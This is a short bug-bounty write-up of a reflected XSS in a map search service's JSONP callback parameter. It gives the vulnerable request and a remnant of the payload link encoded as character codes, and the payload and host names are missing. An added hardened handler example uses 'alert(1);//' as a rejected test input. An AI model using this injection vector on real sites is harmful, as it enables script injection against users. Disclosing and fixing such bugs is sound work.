Self reflected XSS in

This bug was valid for 24 days. Later, it turned out that it was a duplicate (#@&!).

After typing some text into the search box (e.g. “New York, NY”) and clicking the “Search Maps” button there is a GET request to

GET /onebox?obq=New%20York%2C%20NY&flags=JX&appid=ymapsaura2&local_count=10&userLat=52.235352&userLon=21.00939&obd=pt&obflags=D&callback=mycjson14 HTTP/1.1

The “callback” parameter is vulnerable to JavaScript injection, for example by using the following payload:


You can see the effect by visiting the following link:,104,116,116,112,58,47,47,108,117,98,105,46,99,122,34));

This content will be then executed in

The XSS is exploitable only by visiting and modifying the request to (or another website that contains a request to the vulnerable link).
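The root cause described above is a JSONP endpoint that copies the `callback` query parameter into a script response without checking it, so whatever is placed in that parameter is reflected as executable JavaScript. The following is an added example, not the vulnerable service's own code: a small hardened handler that only accepts a plain (optionally dotted) identifier as the callback name, serves the body as JavaScript with `nosniff`, and escapes the two Unicode line terminators that are legal in JSON but break a script. The handler name `handleOnebox`, the query fields and the sample result are constructed for illustration.

```javascript
// Added example (not the original service's code): hardening a JSONP endpoint so
// that the `callback` parameter can never be reflected as arbitrary JavaScript.
// Endpoint name, query fields and sample data are constructed for this example.

// A callback must be a JS identifier, optionally dotted (e.g. "ns.cb_1").
const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$/;
const MAX_CALLBACK_LEN = 64;

// Return the callback name if it is a safe identifier, otherwise null.
function sanitizeCallback(raw) {
  if (typeof raw !== "string") return null;
  if (raw.length === 0 || raw.length > MAX_CALLBACK_LEN) return null;
  return CALLBACK_RE.test(raw) ? raw : null;
}

// Build the JSONP response body for an already-validated callback name.
// U+2028/U+2029 are line terminators in JavaScript but ordinary characters in
// JSON, so they are escaped to keep the embedded literal on one logical line.
function renderJsonp(callback, data) {
  const json = JSON.stringify(data)
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
  // The leading comment keeps an attacker from controlling the first bytes of
  // the response, which some content-sniffing tricks depend on.
  return `/**/ typeof ${callback} === "function" && ${callback}(${json});`;
}

// Simulated request handler: takes the parsed query string and returns
// { status, headers, body } instead of writing to a socket, so it can be tested.
function handleOnebox(query) {
  const callback = sanitizeCallback(query.callback);
  if (callback === null) {
    return {
      status: 400,
      headers: {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
      },
      body: JSON.stringify({ error: "invalid callback" }),
    };
  }
  // Constructed sample result for a query such as "New York, NY".
  const result = {
    query: query.obq || "",
    results: [{ name: "New York, NY", lat: 40.7128, lon: -74.006 }],
  };
  return {
    status: 200,
    headers: {
      // Serving as JavaScript (never text/html) plus nosniff keeps a browser
      // from rendering the body as a page if it is opened directly.
      "Content-Type": "application/javascript; charset=utf-8",
      "X-Content-Type-Options": "nosniff",
    },
    body: renderJsonp(callback, result),
  };
}

// Stand-alone demonstration with constructed inputs.
if (typeof require !== "undefined" && require.main === module) {
  console.log(handleOnebox({ obq: "New York, NY", callback: "mycjson14" }).body);
  console.log(handleOnebox({ obq: "New York, NY", callback: "alert(1);//" }).status); // 400
}
```

With this check in place the legitimate `callback=mycjson14` from the request above still works, while any value containing parentheses, quotes, semicolons or other non-identifier characters is rejected with a 400 instead of being echoed into the script body. Note that validating the callback does not change the fact that the endpoint is reachable cross-origin: that is the nature of JSONP, which is why the data it returns should never be sensitive.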


[February 2nd 2014] - bug was reported
[March 5th 2014] - bug was marked as a duplicate

P.S. No screenshots this time, please enjoy the video:
